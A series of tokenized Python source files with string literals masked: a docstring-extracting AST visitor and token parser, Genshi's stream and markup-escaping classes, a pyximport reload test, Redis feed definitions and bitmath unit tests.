expression_value ( ) <EOL> expression . append ( Text ( expression_text ) ) <EOL> for attribute in self . attributes : <EOL> attribute . append ( expression ) <EOL> def visitAssName ( self , node ) : <EOL> self . attributes . append ( make_attribute ( node . name , <EOL> lineno = node . lineno ) ) <EOL> def visitAssTuple ( self , node ) : <EOL> attributes = self . attributes <EOL> self . attributes = [ ] <EOL> self . default_visit ( node ) <EOL> n = pynodes . attribute_tuple ( ) <EOL> n . extend ( self . attributes ) <EOL> n [ '<STR_LIT>' ] = self . attributes [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> attributes . append ( n ) <EOL> self . attributes = attributes <EOL> def visitAssAttr ( self , node ) : <EOL> self . default_visit ( node , node . attrname ) <EOL> def visitGetattr ( self , node , suffix ) : <EOL> self . default_visit ( node , node . attrname + '<STR_LIT:.>' + suffix ) <EOL> def visitName ( self , node , suffix ) : <EOL> self . attributes . append ( make_attribute ( node . name + '<STR_LIT:.>' + suffix , <EOL> lineno = node . lineno ) ) <EOL> class FunctionVisitor ( DocstringVisitor ) : <EOL> in_function = <NUM_LIT:0> <EOL> def __init__ ( self , token_parser , function_class ) : <EOL> DocstringVisitor . __init__ ( self , token_parser ) <EOL> self . function_class = function_class <EOL> def visitFunction ( self , node ) : <EOL> if self . in_function : <EOL> self . documentable = None <EOL> return <EOL> self . in_function = <NUM_LIT:1> <EOL> self . function = function = make_function_like_section ( <EOL> name = node . name , <EOL> lineno = node . lineno , <EOL> doc = node . doc , <EOL> function_class = self . function_class ) <EOL> self . context . append ( function ) <EOL> self . documentable = function <EOL> self . parse_parameter_list ( node ) <EOL> self . visit ( node . code ) <EOL> self . context . pop ( ) <EOL> def parse_parameter_list ( self , node ) : <EOL> parameters = [ ] <EOL> special = [ ] <EOL> argnames = list ( node . 
argnames ) <EOL> if node . kwargs : <EOL> special . append ( make_parameter ( argnames [ - <NUM_LIT:1> ] , excess_keyword = <NUM_LIT:1> ) ) <EOL> argnames . pop ( ) <EOL> if node . varargs : <EOL> special . append ( make_parameter ( argnames [ - <NUM_LIT:1> ] , <EOL> excess_positional = <NUM_LIT:1> ) ) <EOL> argnames . pop ( ) <EOL> defaults = list ( node . defaults ) <EOL> defaults = [ None ] * ( len ( argnames ) - len ( defaults ) ) + defaults <EOL> function_parameters = self . token_parser . function_parameters ( <EOL> node . lineno ) <EOL> for argname , default in zip ( argnames , defaults ) : <EOL> if type ( argname ) is tuple : <EOL> parameter = pynodes . parameter_tuple ( ) <EOL> for tuplearg in argname : <EOL> parameter . append ( make_parameter ( tuplearg ) ) <EOL> argname = normalize_parameter_name ( argname ) <EOL> else : <EOL> parameter = make_parameter ( argname ) <EOL> if default : <EOL> n_default = pynodes . parameter_default ( ) <EOL> n_default . append ( Text ( function_parameters [ argname ] ) ) <EOL> parameter . append ( n_default ) <EOL> parameters . append ( parameter ) <EOL> if parameters or special : <EOL> special . reverse ( ) <EOL> parameters . extend ( special ) <EOL> parameter_list = pynodes . parameter_list ( ) <EOL> parameter_list . extend ( parameters ) <EOL> self . function . append ( parameter_list ) <EOL> class ClassVisitor ( AssignmentVisitor ) : <EOL> in_class = <NUM_LIT:0> <EOL> def __init__ ( self , token_parser ) : <EOL> AssignmentVisitor . __init__ ( self , token_parser ) <EOL> self . bases = [ ] <EOL> def visitClass ( self , node ) : <EOL> if self . in_class : <EOL> self . documentable = None <EOL> return <EOL> self . in_class = <NUM_LIT:1> <EOL> for base in node . bases : <EOL> self . visit ( base ) <EOL> self . klass = klass = make_class_section ( node . name , self . bases , <EOL> doc = node . doc , <EOL> lineno = node . lineno ) <EOL> self . context . append ( klass ) <EOL> self . documentable = klass <EOL> self . 
visit ( node . code ) <EOL> self . context . pop ( ) <EOL> def visitGetattr ( self , node , suffix = None ) : <EOL> if suffix : <EOL> name = node . attrname + '<STR_LIT:.>' + suffix <EOL> else : <EOL> name = node . attrname <EOL> self . default_visit ( node , name ) <EOL> def visitName ( self , node , suffix = None ) : <EOL> if suffix : <EOL> name = node . name + '<STR_LIT:.>' + suffix <EOL> else : <EOL> name = node . name <EOL> self . bases . append ( name ) <EOL> def visitFunction ( self , node ) : <EOL> if node . name == '<STR_LIT>' : <EOL> visitor = InitMethodVisitor ( self . token_parser , <EOL> function_class = pynodes . method_section ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> else : <EOL> visitor = FunctionVisitor ( self . token_parser , <EOL> function_class = pynodes . method_section ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> self . context [ - <NUM_LIT:1> ] . append ( visitor . function ) <EOL> class InitMethodVisitor ( FunctionVisitor , AssignmentVisitor ) : pass <EOL> class TokenParser : <EOL> def __init__ ( self , text ) : <EOL> self . text = text + '<STR_LIT>' <EOL> self . lines = self . text . splitlines ( <NUM_LIT:1> ) <EOL> self . generator = tokenize . generate_tokens ( iter ( self . lines ) . next ) <EOL> self . next ( ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> self . token = self . generator . next ( ) <EOL> self . type , self . string , self . start , self . end , self . line = self . token <EOL> return self . token <EOL> def goto_line ( self , lineno ) : <EOL> while self . start [ <NUM_LIT:0> ] < lineno : <EOL> self . next ( ) <EOL> return token <EOL> def rhs ( self , lineno ) : <EOL> """<STR_LIT>""" <EOL> self . goto_line ( lineno ) <EOL> while self . string != '<STR_LIT:=>' : <EOL> self . next ( ) <EOL> self . stack = None <EOL> while self . type != token . NEWLINE and self . string != '<STR_LIT:;>' : <EOL> if self . 
string == '<STR_LIT:=>' and not self . stack : <EOL> self . tokens = [ ] <EOL> self . stack = [ ] <EOL> self . _type = None <EOL> self . _string = None <EOL> self . _backquote = <NUM_LIT:0> <EOL> else : <EOL> self . note_token ( ) <EOL> self . next ( ) <EOL> self . next ( ) <EOL> text = '<STR_LIT>' . join ( self . tokens ) <EOL> return text . strip ( ) <EOL> closers = { '<STR_LIT:)>' : '<STR_LIT:(>' , '<STR_LIT:]>' : '<STR_LIT:[>' , '<STR_LIT:}>' : '<STR_LIT:{>' } <EOL> openers = { '<STR_LIT:(>' : <NUM_LIT:1> , '<STR_LIT:[>' : <NUM_LIT:1> , '<STR_LIT:{>' : <NUM_LIT:1> } <EOL> del_ws_prefix = { '<STR_LIT:.>' : <NUM_LIT:1> , '<STR_LIT:=>' : <NUM_LIT:1> , '<STR_LIT:)>' : <NUM_LIT:1> , '<STR_LIT:]>' : <NUM_LIT:1> , '<STR_LIT:}>' : <NUM_LIT:1> , '<STR_LIT::>' : <NUM_LIT:1> , '<STR_LIT:U+002C>' : <NUM_LIT:1> } <EOL> no_ws_suffix = { '<STR_LIT:.>' : <NUM_LIT:1> , '<STR_LIT:=>' : <NUM_LIT:1> , '<STR_LIT:(>' : <NUM_LIT:1> , '<STR_LIT:[>' : <NUM_LIT:1> , '<STR_LIT:{>' : <NUM_LIT:1> } <EOL> def note_token ( self ) : <EOL> if self . type == tokenize . NL : <EOL> return <EOL> del_ws = self . string in self . del_ws_prefix <EOL> append_ws = self . string not in self . no_ws_suffix <EOL> if self . string in self . openers : <EOL> self . stack . append ( self . string ) <EOL> if ( self . _type == token . NAME <EOL> or self . _string in self . closers ) : <EOL> del_ws = <NUM_LIT:1> <EOL> elif self . string in self . closers : <EOL> assert self . stack [ - <NUM_LIT:1> ] == self . closers [ self . string ] <EOL> self . stack . pop ( ) <EOL> elif self . string == '<STR_LIT>' : <EOL> if self . _backquote : <EOL> del_ws = <NUM_LIT:1> <EOL> assert self . stack [ - <NUM_LIT:1> ] == '<STR_LIT>' <EOL> self . stack . pop ( ) <EOL> else : <EOL> append_ws = <NUM_LIT:0> <EOL> self . stack . append ( '<STR_LIT>' ) <EOL> self . _backquote = not self . _backquote <EOL> if del_ws and self . tokens and self . tokens [ - <NUM_LIT:1> ] == '<STR_LIT:U+0020>' : <EOL> del self . 
tokens [ - <NUM_LIT:1> ] <EOL> self . tokens . append ( self . string ) <EOL> self . _type = self . type <EOL> self . _string = self . string <EOL> if append_ws : <EOL> self . tokens . append ( '<STR_LIT:U+0020>' ) <EOL> def function_parameters ( self , lineno ) : <EOL> """<STR_LIT>""" <EOL> self . goto_line ( lineno ) <EOL> while self . string != '<STR_LIT>' : <EOL> self . next ( ) <EOL> while self . string != '<STR_LIT:(>' : <EOL> self . next ( ) <EOL> name = None <EOL> default = None <EOL> parameter_tuple = None <EOL> self . tokens = [ ] <EOL> parameters = { } <EOL> self . stack = [ self . string ] <EOL> self . next ( ) <EOL> while <NUM_LIT:1> : <EOL> if len ( self . stack ) == <NUM_LIT:1> : <EOL> if parameter_tuple : <EOL> name = '<STR_LIT>' . join ( self . tokens ) . strip ( ) <EOL> self . tokens = [ ] <EOL> parameter_tuple = None <EOL> if self . string in ( '<STR_LIT:)>' , '<STR_LIT:U+002C>' ) : <EOL> if name : <EOL> if self . tokens : <EOL> default_text = '<STR_LIT>' . join ( self . tokens ) . strip ( ) <EOL> else : <EOL> default_text = None <EOL> parameters [ name ] = default_text <EOL> self . tokens = [ ] <EOL> name = None <EOL> default = None <EOL> if self . string == '<STR_LIT:)>' : <EOL> break <EOL> elif self . type == token . NAME : <EOL> if name and default : <EOL> self . note_token ( ) <EOL> else : <EOL> assert name is None , ( <EOL> '<STR_LIT>' <EOL> % ( self . token , name , parameters , self . stack ) ) <EOL> name = self . string <EOL> elif self . string == '<STR_LIT:=>' : <EOL> assert name is not None , '<STR_LIT>' % ( self . token , ) <EOL> assert default is None , '<STR_LIT>' % ( self . token , ) <EOL> assert self . tokens == [ ] , '<STR_LIT>' % ( self . token , ) <EOL> default = <NUM_LIT:1> <EOL> self . _type = None <EOL> self . _string = None <EOL> self . _backquote = <NUM_LIT:0> <EOL> elif name : <EOL> self . note_token ( ) <EOL> elif self . string == '<STR_LIT:(>' : <EOL> parameter_tuple = <NUM_LIT:1> <EOL> self . _type = None <EOL> self . 
_string = None <EOL> self . _backquote = <NUM_LIT:0> <EOL> self . note_token ( ) <EOL> else : <EOL> assert ( self . string in ( '<STR_LIT:*>' , '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> or self . type == tokenize . COMMENT ) , ( <EOL> '<STR_LIT>' % ( self . token , ) ) <EOL> else : <EOL> self . note_token ( ) <EOL> self . next ( ) <EOL> return parameters <EOL> def make_docstring ( doc , lineno ) : <EOL> n = pynodes . docstring ( ) <EOL> if lineno : <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( Text ( doc ) ) <EOL> return n <EOL> def append_docstring ( node , doc , lineno ) : <EOL> if doc : <EOL> node . append ( make_docstring ( doc , lineno ) ) <EOL> def make_class_section ( name , bases , lineno , doc ) : <EOL> n = pynodes . class_section ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( make_object_name ( name ) ) <EOL> for base in bases : <EOL> b = pynodes . class_base ( ) <EOL> b . append ( make_object_name ( base ) ) <EOL> n . append ( b ) <EOL> append_docstring ( n , doc , lineno ) <EOL> return n <EOL> def make_object_name ( name ) : <EOL> n = pynodes . object_name ( ) <EOL> n . append ( Text ( name ) ) <EOL> return n <EOL> def make_function_like_section ( name , lineno , doc , function_class ) : <EOL> n = function_class ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( make_object_name ( name ) ) <EOL> append_docstring ( n , doc , lineno ) <EOL> return n <EOL> def make_import_group ( names , lineno , from_name = None ) : <EOL> n = pynodes . import_group ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> if from_name : <EOL> n_from = pynodes . import_from ( ) <EOL> n_from . append ( Text ( from_name ) ) <EOL> n . append ( n_from ) <EOL> for name , alias in names : <EOL> n_name = pynodes . import_name ( ) <EOL> n_name . append ( Text ( name ) ) <EOL> if alias : <EOL> n_alias = pynodes . import_alias ( ) <EOL> n_alias . append ( Text ( alias ) ) <EOL> n_name . append ( n_alias ) <EOL> n . 
append ( n_name ) <EOL> return n <EOL> def make_class_attribute ( name , lineno ) : <EOL> n = pynodes . class_attribute ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( Text ( name ) ) <EOL> return n <EOL> def make_attribute ( name , lineno ) : <EOL> n = pynodes . attribute ( ) <EOL> n [ '<STR_LIT>' ] = lineno <EOL> n . append ( make_object_name ( name ) ) <EOL> return n <EOL> def make_parameter ( name , excess_keyword = <NUM_LIT:0> , excess_positional = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> n = pynodes . parameter ( ) <EOL> n . append ( make_object_name ( name ) ) <EOL> assert not excess_keyword or not excess_positional <EOL> if excess_keyword : <EOL> n [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if excess_positional : <EOL> n [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> return n <EOL> def trim_docstring ( text ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return text <EOL> lines = text . expandtabs ( ) . splitlines ( ) <EOL> indent = sys . maxint <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> stripped = line . lstrip ( ) <EOL> if stripped : <EOL> indent = min ( indent , len ( line ) - len ( stripped ) ) <EOL> trimmed = [ lines [ <NUM_LIT:0> ] . strip ( ) ] <EOL> if indent < sys . maxint : <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> trimmed . append ( line [ indent : ] . rstrip ( ) ) <EOL> while trimmed and not trimmed [ - <NUM_LIT:1> ] : <EOL> trimmed . pop ( ) <EOL> while trimmed and not trimmed [ <NUM_LIT:0> ] : <EOL> trimmed . pop ( <NUM_LIT:0> ) <EOL> return '<STR_LIT:\n>' . join ( trimmed ) <EOL> def normalize_parameter_name ( name ) : <EOL> """<STR_LIT>""" <EOL> if type ( name ) is tuple : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ normalize_parameter_name ( n ) for n in name ] ) <EOL> else : <EOL> return name <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> args = sys . 
argv [ <NUM_LIT:1> : ] <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> filename = args [ <NUM_LIT:1> ] <EOL> module_text = open ( filename ) . read ( ) <EOL> ast = compiler . parse ( module_text ) <EOL> visitor = compiler . visitor . ExampleASTVisitor ( ) <EOL> compiler . walk ( ast , visitor , walker = visitor , verbose = <NUM_LIT:1> ) <EOL> else : <EOL> filename = args [ <NUM_LIT:0> ] <EOL> content = open ( filename ) . read ( ) <EOL> print parse_module ( content , filename ) . pformat ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from functools import reduce <EOL> except ImportError : <EOL> pass <EOL> from itertools import chain <EOL> import operator <EOL> from genshi . util import plaintext , stripentities , striptags <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> __docformat__ = '<STR_LIT>' <EOL> class StreamEventKind ( str ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> _instances = { } <EOL> def __new__ ( cls , val ) : <EOL> return cls . _instances . setdefault ( val , str . __new__ ( cls , val ) ) <EOL> class Stream ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> START = StreamEventKind ( '<STR_LIT>' ) <EOL> END = StreamEventKind ( '<STR_LIT>' ) <EOL> TEXT = StreamEventKind ( '<STR_LIT>' ) <EOL> XML_DECL = StreamEventKind ( '<STR_LIT>' ) <EOL> DOCTYPE = StreamEventKind ( '<STR_LIT>' ) <EOL> START_NS = StreamEventKind ( '<STR_LIT>' ) <EOL> END_NS = StreamEventKind ( '<STR_LIT>' ) <EOL> START_CDATA = StreamEventKind ( '<STR_LIT>' ) <EOL> END_CDATA = StreamEventKind ( '<STR_LIT>' ) <EOL> PI = StreamEventKind ( '<STR_LIT>' ) <EOL> COMMENT = StreamEventKind ( '<STR_LIT>' ) <EOL> def __init__ ( self , events , serializer = None ) : <EOL> """<STR_LIT>""" <EOL> self . events = events <EOL> self . serializer = serializer <EOL> def __iter__ ( self ) : <EOL> return iter ( self . events ) <EOL> def __or__ ( self , function ) : <EOL> """<STR_LIT>""" <EOL> return Stream ( _ensure ( function ( self ) ) , serializer = self . serializer ) <EOL> def filter ( self , * filters ) : <EOL> """<STR_LIT>""" <EOL> return reduce ( operator . or_ , ( self , ) + filters ) <EOL> def render ( self , method = None , encoding = '<STR_LIT:utf-8>' , out = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from genshi . output import encode <EOL> if method is None : <EOL> method = self . serializer or '<STR_LIT>' <EOL> generator = self . 
serialize ( method = method , ** kwargs ) <EOL> return encode ( generator , method = method , encoding = encoding , out = out ) <EOL> def select ( self , path , namespaces = None , variables = None ) : <EOL> """<STR_LIT>""" <EOL> from genshi . path import Path <EOL> return Path ( path ) . select ( self , namespaces , variables ) <EOL> def serialize ( self , method = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from genshi . output import get_serializer <EOL> if method is None : <EOL> method = self . serializer or '<STR_LIT>' <EOL> return get_serializer ( method , ** kwargs ) ( _ensure ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . render ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( encoding = None ) <EOL> def __html__ ( self ) : <EOL> return self <EOL> START = Stream . START <EOL> END = Stream . END <EOL> TEXT = Stream . TEXT <EOL> XML_DECL = Stream . XML_DECL <EOL> DOCTYPE = Stream . DOCTYPE <EOL> START_NS = Stream . START_NS <EOL> END_NS = Stream . END_NS <EOL> START_CDATA = Stream . START_CDATA <EOL> END_CDATA = Stream . END_CDATA <EOL> PI = Stream . PI <EOL> COMMENT = Stream . COMMENT <EOL> def _ensure ( stream ) : <EOL> """<STR_LIT>""" <EOL> stream = iter ( stream ) <EOL> event = stream . next ( ) <EOL> if type ( event ) is not tuple or len ( event ) != <NUM_LIT:3> : <EOL> for event in chain ( [ event ] , stream ) : <EOL> if hasattr ( event , '<STR_LIT>' ) : <EOL> event = event . totuple ( ) <EOL> else : <EOL> event = TEXT , unicode ( event ) , ( None , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> yield event <EOL> return <EOL> yield event <EOL> for event in stream : <EOL> yield event <EOL> class Attrs ( tuple ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> def __contains__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for attr , _ in self : <EOL> if attr == name : <EOL> return True <EOL> def __getslice__ ( self , i , j ) : <EOL> """<STR_LIT>""" <EOL> return Attrs ( tuple . 
__getslice__ ( self , i , j ) ) <EOL> def __or__ ( self , attrs ) : <EOL> """<STR_LIT>""" <EOL> repl = dict ( [ ( an , av ) for an , av in attrs if an in self ] ) <EOL> return Attrs ( [ ( sn , repl . get ( sn , sv ) ) for sn , sv in self ] + <EOL> [ ( an , av ) for an , av in attrs if an not in self ] ) <EOL> def __repr__ ( self ) : <EOL> if not self : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ repr ( item ) for item in self ] ) <EOL> def __sub__ ( self , names ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( names , basestring ) : <EOL> names = ( names , ) <EOL> return Attrs ( [ ( name , val ) for name , val in self if name not in names ] ) <EOL> def get ( self , name , default = None ) : <EOL> """<STR_LIT>""" <EOL> for attr , value in self : <EOL> if attr == name : <EOL> return value <EOL> return default <EOL> def totuple ( self ) : <EOL> """<STR_LIT>""" <EOL> return TEXT , u'<STR_LIT>' . join ( [ x [ <NUM_LIT:1> ] for x in self ] ) , ( None , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> class Markup ( unicode ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ ] <EOL> def __add__ ( self , other ) : <EOL> return Markup ( unicode ( self ) + unicode ( escape ( other ) ) ) <EOL> def __radd__ ( self , other ) : <EOL> return Markup ( unicode ( escape ( other ) ) + unicode ( self ) ) <EOL> def __mod__ ( self , args ) : <EOL> if isinstance ( args , dict ) : <EOL> args = dict ( zip ( args . keys ( ) , map ( escape , args . values ( ) ) ) ) <EOL> elif isinstance ( args , ( list , tuple ) ) : <EOL> args = tuple ( map ( escape , args ) ) <EOL> else : <EOL> args = escape ( args ) <EOL> return Markup ( unicode . __mod__ ( self , args ) ) <EOL> def __mul__ ( self , num ) : <EOL> return Markup ( unicode ( self ) * num ) <EOL> def __rmul__ ( self , num ) : <EOL> return Markup ( num * unicode ( self ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . 
__name__ , unicode ( self ) ) <EOL> def join ( self , seq , escape_quotes = True ) : <EOL> """<STR_LIT>""" <EOL> return Markup ( unicode ( self ) . join ( [ escape ( item , quotes = escape_quotes ) <EOL> for item in seq ] ) ) <EOL> def escape ( cls , text , quotes = True ) : <EOL> """<STR_LIT>""" <EOL> if not text : <EOL> return cls ( ) <EOL> if type ( text ) is cls : <EOL> return text <EOL> if hasattr ( text , '<STR_LIT>' ) : <EOL> return Markup ( text . __html__ ( ) ) <EOL> text = unicode ( text ) . replace ( '<STR_LIT:&>' , '<STR_LIT>' ) . replace ( '<STR_LIT:<>' , '<STR_LIT>' ) . replace ( '<STR_LIT:>>' , '<STR_LIT>' ) <EOL> if quotes : <EOL> text = text . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> return cls ( text ) <EOL> escape = classmethod ( escape ) <EOL> def unescape ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self : <EOL> return u'<STR_LIT>' <EOL> return unicode ( self ) . replace ( '<STR_LIT>' , '<STR_LIT:">' ) . replace ( '<STR_LIT>' , '<STR_LIT:>>' ) . replace ( '<STR_LIT>' , '<STR_LIT:<>' ) . replace ( '<STR_LIT>' , '<STR_LIT:&>' ) <EOL> def stripentities ( self , keepxmlentities = False ) : <EOL> """<STR_LIT>""" <EOL> return Markup ( stripentities ( self , keepxmlentities = keepxmlentities ) ) <EOL> def striptags ( self ) : <EOL> """<STR_LIT>""" <EOL> return Markup ( striptags ( self ) ) <EOL> try : <EOL> from genshi . _speedups import Markup <EOL> except ImportError : <EOL> pass <EOL> escape = Markup . escape <EOL> def unescape ( text ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( text , Markup ) : <EOL> return text <EOL> return text . unescape ( ) <EOL> class Namespace ( object ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , uri ) : <EOL> if type ( uri ) is cls : <EOL> return uri <EOL> return object . __new__ ( cls ) <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . uri , ) <EOL> def __getstate__ ( self ) : <EOL> return self . uri <EOL> def __setstate__ ( self , uri ) : <EOL> self . 
uri = uri <EOL> def __init__ ( self , uri ) : <EOL> self . uri = unicode ( uri ) <EOL> def __contains__ ( self , qname ) : <EOL> return qname . namespace == self . uri <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , Namespace ) : <EOL> return self . uri == other . uri <EOL> return self . uri == other <EOL> def __getitem__ ( self , name ) : <EOL> return QName ( self . uri + u'<STR_LIT:}>' + name ) <EOL> __getattr__ = __getitem__ <EOL> def __hash__ ( self ) : <EOL> return hash ( self . uri ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . uri <EOL> def __str__ ( self ) : <EOL> return self . uri . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . uri <EOL> XML_NAMESPACE = Namespace ( '<STR_LIT>' ) <EOL> class QName ( unicode ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __new__ ( cls , qname ) : <EOL> """<STR_LIT>""" <EOL> if type ( qname ) is cls : <EOL> return qname <EOL> parts = qname . lstrip ( u'<STR_LIT:{>' ) . split ( u'<STR_LIT:}>' , <NUM_LIT:1> ) <EOL> if len ( parts ) > <NUM_LIT:1> : <EOL> self = unicode . __new__ ( cls , u'<STR_LIT>' % qname ) <EOL> self . namespace , self . localname = map ( unicode , parts ) <EOL> else : <EOL> self = unicode . __new__ ( cls , qname ) <EOL> self . namespace , self . localname = None , unicode ( qname ) <EOL> return self <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . lstrip ( '<STR_LIT:{>' ) , ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % unicode . __repr__ ( self . lstrip ( '<STR_LIT:{>' ) ) </s>
<s> import pyximport ; pyximport . install ( ) <EOL> import os , sys <EOL> import time , shutil <EOL> import tempfile <EOL> def make_tempdir ( ) : <EOL> tempdir = os . path . join ( tempfile . gettempdir ( ) , "<STR_LIT>" ) <EOL> if os . path . exists ( tempdir ) : <EOL> remove_tempdir ( tempdir ) <EOL> os . mkdir ( tempdir ) <EOL> return tempdir <EOL> def remove_tempdir ( tempdir ) : <EOL> shutil . rmtree ( tempdir , <NUM_LIT:0> , on_remove_file_error ) <EOL> def on_remove_file_error ( func , path , excinfo ) : <EOL> print "<STR_LIT>" , path <EOL> print "<STR_LIT>" <EOL> print func , excinfo <EOL> print "<STR_LIT>" <EOL> def test ( ) : <EOL> tempdir = make_tempdir ( ) <EOL> sys . path . append ( tempdir ) <EOL> filename = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> open ( filename , "<STR_LIT:w>" ) . write ( "<STR_LIT>" ) <EOL> import dummy <EOL> reload ( dummy ) <EOL> depend_filename = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> depend_file = open ( depend_filename , "<STR_LIT:w>" ) <EOL> depend_file . write ( "<STR_LIT>" ) <EOL> depend_file . close ( ) <EOL> build_filename = os . path . join ( tempdir , "<STR_LIT>" ) <EOL> build_file = open ( build_filename , "<STR_LIT:w>" ) <EOL> build_file . write ( """<STR_LIT>""" ) <EOL> build_file . close ( ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> reload ( dummy ) <EOL> assert len ( pyximport . _test_files ) == <NUM_LIT:1> , pyximport . _test_files <EOL> reload ( dummy ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> open ( os . path . join ( tempdir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( "<STR_LIT:U+0020>" ) <EOL> print "<STR_LIT>" <EOL> reload ( dummy ) <EOL> assert len ( pyximport . _test_files ) == <NUM_LIT:1> , pyximport . 
_test_files <EOL> reload ( dummy ) <EOL> assert len ( pyximport . _test_files ) == <NUM_LIT:0> , pyximport . _test_files <EOL> remove_tempdir ( tempdir ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> from stream_framework . aggregators . base import RecentVerbAggregator <EOL> from stream_framework . feeds . redis import RedisFeed <EOL> from stream_framework . feeds . aggregated_feed . redis import RedisAggregatedFeed <EOL> class PinFeed ( RedisFeed ) : <EOL> key_format = '<STR_LIT>' <EOL> class AggregatedPinFeed ( RedisAggregatedFeed ) : <EOL> aggregator_class = RecentVerbAggregator <EOL> key_format = '<STR_LIT>' <EOL> class UserPinFeed ( PinFeed ) : <EOL> key_format = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from . import TestCase <EOL> import bitmath <EOL> class TestInit ( TestCase ) : <EOL> def test___init__invalid_input_types ( self ) : <EOL> """<STR_LIT>""" <EOL> invalid_inputs = [ "<STR_LIT>" , <NUM_LIT:100> + <NUM_LIT> , None ] <EOL> for invalid_input in invalid_inputs : <EOL> with self . assertRaises ( ValueError ) : <EOL> bitmath . best_prefix ( invalid_input ) <EOL> def test___init_multiple_kwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> multi_kwargs = { <EOL> "<STR_LIT:value>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } <EOL> with self . assertRaises ( ValueError ) : <EOL> bitmath . Byte ( ** multi_kwargs ) <EOL> def test___init__valid_inputs ( self ) : <EOL> """<STR_LIT>""" <EOL> inputs = [ <EOL> ( ( <NUM_LIT:100> , ) , dict ( ) ) , <EOL> ( tuple ( ) , { "<STR_LIT:value>" : <NUM_LIT:100> } ) , <EOL> ( tuple ( ) , { "<STR_LIT>" : <NUM_LIT:100> } ) , <EOL> ( tuple ( ) , { "<STR_LIT>" : <NUM_LIT> } ) <EOL> ] <EOL> for args , kwargs in inputs : <EOL> self . assertEqual ( bitmath . Byte ( * args , ** kwargs ) , bitmath . Byte ( <NUM_LIT:100> ) ) </s>
